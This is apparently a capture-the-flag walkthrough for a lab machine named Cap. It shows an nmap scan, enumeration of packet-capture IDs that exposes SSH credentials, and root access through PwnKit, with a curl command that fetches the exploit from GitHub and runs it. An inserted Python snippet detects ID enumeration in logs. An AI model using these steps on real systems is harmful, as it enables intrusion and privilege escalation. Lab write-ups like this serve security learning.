Cap Walkthrough
Nmap Scan
nmap --privileged -sVC -v3 -oA output cap.htb
Running a comprehensive Nmap scan (-sVC for service/version detection and default scripts) revealed three open ports:
- Port 21 (FTP): vsftpd 3.0.3
- Port 22 (SSH): OpenSSH 8.2p1 (Ubuntu)
- Port 80 (HTTP): running behind Gunicorn with a Security Dashboard web app.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 (Ubuntu)
80/tcp open http Gunicorn (Security Dashboard)
With the HTTP service exposed, I proceeded to explore the web application.
Initial Access
After discovering port 80 was open, I navigated to the app:

I found a Security Snapshot button, which led me to a packet capturing interface. It showed an ID 7 for my capture, suggesting previous captures were available. I fuzzed the capture IDs with Caido to enumerate and download all accessible captures.


Filtering by response length helped me weed out invalid or empty captures:
- Length 392 filtered out all 302 errors.
- Length 17300 filtered out captures with no packets.
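
A defender's view of the ID fuzzing described above, as an added example that is not part of the original walkthrough: it scans access-log lines for one client requesting many distinct capture IDs within a short window while a large share of responses are not 200. The `/data/<id>` route, the combined-style log layout, the thresholds and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined-style access log line; the /data/<id> route is an assumption.
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"GET /data/(?P<id>\d+) [^"]*" (?P<status>\d{3}) ')

def sample_log():
    """Constructed lines: one client walks IDs 0..11, another reloads one capture."""
    lines = []
    for i in range(12):
        status = 200 if i in (0, 4, 5, 7) else 302
        size = 20480 if status == 200 else 392
        lines.append(f'192.0.2.50 - - [01/Jan/2024:10:00:{i:02d} +0000] '
                     f'"GET /data/{i} HTTP/1.1" {status} {size}')
    for sec in (30, 40, 50):
        lines.append(f'198.51.100.7 - - [01/Jan/2024:10:00:{sec} +0000] '
                     f'"GET /data/3 HTTP/1.1" 200 20480')
    return lines

def find_id_enumeration(lines, window=60, min_ids=8, min_miss_ratio=0.5):
    """Return {client_ip: [ids]} for clients that sweep object IDs.

    A client is flagged when, inside any `window`-second span, it requests at
    least `min_ids` distinct IDs and at least `min_miss_ratio` of those
    requests do not return 200 (redirects or errors for IDs it cannot see).
    """
    per_client = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a capture request, or an unparseable line
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        per_client[m['ip']].append((ts, int(m['id']), int(m['status'])))
    alerts = {}
    for ip, hits in per_client.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans <= `window` seconds.
            while (hits[end][0] - hits[start][0]).total_seconds() > window:
                start += 1
            win = hits[start:end + 1]
            ids = {h[1] for h in win}
            misses = sum(1 for h in win if h[2] != 200)
            if len(ids) >= min_ids and misses / len(win) >= min_miss_ratio:
                alerts[ip] = sorted(ids)  # IDs seen when the threshold tripped
                break
    return alerts
```

Detection only narrows the exposure; the underlying fix is for the application to check that the requested capture belongs to the requesting session before serving it.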

After downloading captures, IDs 5 and 4 were not useful.


However, the 0.pcap file contained credentials:

Using these credentials, I SSH’d into the machine as user nathan.
ssh nathan@cap.htb
Verified the login:
nathan@cap:~$ ifconfig && hostname && whoami
cap
nathan
Privilege Escalation
I ran LinPEAS to identify privilege escalation vectors. The scan revealed that the binary pkexec has the SUID bit set, a known vulnerability.
-rwsr-xr-x 1 root root 31032 Aug 16 2019 /usr/bin/pkexec

This indicated the system was vulnerable to PwnKit (CVE-2021-4034). I downloaded the exploit script, transferred it to the target, and executed it to gain a root shell.
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
scp PwnKit nathan@cap.htb:~
chmod +x PwnKit
./PwnKit
With root access confirmed:
root@cap:/# whoami
root
Summary
- Initial Access: Extracted SSH credentials from packet captures available via the web app.
- Privilege Escalation: Exploited vulnerable pkexec binary with PwnKit for root access.